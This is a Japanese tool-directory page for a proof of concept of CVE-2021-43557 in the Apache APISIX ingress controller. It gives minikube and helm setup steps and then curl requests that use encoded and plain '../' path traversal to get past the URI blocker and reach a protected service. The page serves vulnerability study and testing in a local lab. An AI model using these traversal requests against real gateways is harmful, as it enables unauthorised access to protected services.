Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
k8s-CVE-2021-43557-poc — CVE-2021-43557 の PoC | Kitploit
ツール/GitHubGitHub/xvnpw/k8s-cve-2021-43557-poc
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用クラウドセキュリティAPIセキュリティ
GitHubxvnpw/k8s-cve-2021-43557-poc

k8s-CVE-2021-43557-poc

CVE-2021-43557 の PoC

リポジトリを見る
2234年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

インストール

  • minikube をインストール
  • apisix をインストール:
root@kitploit:~
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • app.yaml をデプロイ: kubectl apply -f app.yaml
  • ルートをデプロイ: kubectl apply -f routes.yaml

オプション: アプリイメージを変更する必要がある場合:

  • (オプション)Docker イメージをビルド:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (オプション)Docker イメージを minikube にプッシュ:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1

エクスプロイト

手動

パブリックサービスにアクセスするには:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'

200 が返されるはずです

保護されたサービスにアクセスするには:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'

403 が返されるはずです

URIブロッカーをバイパスして保護されたサービスにアクセスするには: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test' URIブロッカーをバイパスして保護されたサービスにアクセスするには: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'

どちらも 200 が返されるはずです

ツールをダウンロード